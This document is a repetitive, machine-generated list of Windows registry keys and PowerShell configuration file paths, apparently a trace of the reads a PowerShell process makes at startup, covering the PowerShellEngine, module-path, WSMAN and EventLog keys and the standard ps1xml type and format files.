ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
path
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds
HKEY_LOCAL_MACHINE
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
PipelineMaxStackSizeMB
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
System\CurrentControlSet\Control\Session Manager\Environment
HKEY_LOCAL_MACHINE
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
Environment
HKEY_CURRENT_USER
PSMODULEPATH
PSMODULEPATH
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
path
path
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
StackVersion
WinRegistryKey
SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN
HKEY_LOCAL_MACHINE
StackVersion
StackVersion
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
Software\Microsoft\PowerShell\1\PowerShellEngine
HKEY_LOCAL_MACHINE
ApplicationBase
ApplicationBase
ApplicationBase
ApplicationBase
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
File
conout$
File
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\getevent.types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\types.ps1xml
windows\system32\windowspowershell\v1.0\types.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\types.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\diagnostics.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\wsman.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\certificate.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\dotnettypes.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\filesystem.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\help.format.ps1xml
windows\system32\windowspowershell\v1.0\help.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\help.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershellcore.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\powershelltrace.format.ps1xml
ps1xml
File
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
windows\system32\windowspowershell\v1.0\registry.format.ps1xml
c:\
c:\windows\system32\windowspowershell\v1.0\registry.format.ps1xml
ps1xml
File
STD_INPUT_HANDLE
WinRegistryKey
SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
HKEY_LOCAL_MACHINE
path
path
path
path
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Application
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Media Center
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\OAlerts
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\Security
HKEY_LOCAL_MACHINE
WinRegistryKey
SYSTEM\CurrentControlSet\Services\EventLog\System
HKEY_LOCAL_MACHINE
WinRegistryKey
